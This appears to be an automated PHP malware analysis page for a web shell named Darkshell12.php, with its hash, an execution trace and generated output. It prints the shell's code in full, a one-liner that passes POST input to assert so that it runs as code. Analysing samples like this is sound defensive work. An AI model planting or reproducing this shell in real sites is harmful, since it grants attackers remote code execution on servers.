PHP Malware Analysis

Darkshell12.php

md5: 44b36b0f96189198fab1b5427d2b01e5

Jump to:

Screenshot


Attributes

Input


Deobfuscated PHP code

<?php

forward_static_call_array(assert, array($_POST[x]));

Execution traces

data/traces/44b36b0f96189198fab1b5427d2b01e5_trace-1676245526.3479.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:45:52.245739]
1	0	1	0.000145	393576
1	3	0	0.000193	394408	{main}	1		/var/www/html/uploads/Darkshell12.php	0	0
2	4	0	0.000239	394784	forward_static_call_array	0		/var/www/html/uploads/Darkshell12.php	2	2	'assert'	[0 => NULL]
3	5	0	0.000260	395256	assert	0		/var/www/html/uploads/Darkshell12.php	2	1	NULL
3	5	1	0.000281	395296
3	5	R			FALSE
2	4	1	0.000295	395240
2	4	R			FALSE
1	3	1	0.000307	394408
			0.000330	314264
TRACE END   [2023-02-12 21:45:52.245953]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
    forward_static_call_array(assert,array($_POST[x]));
?>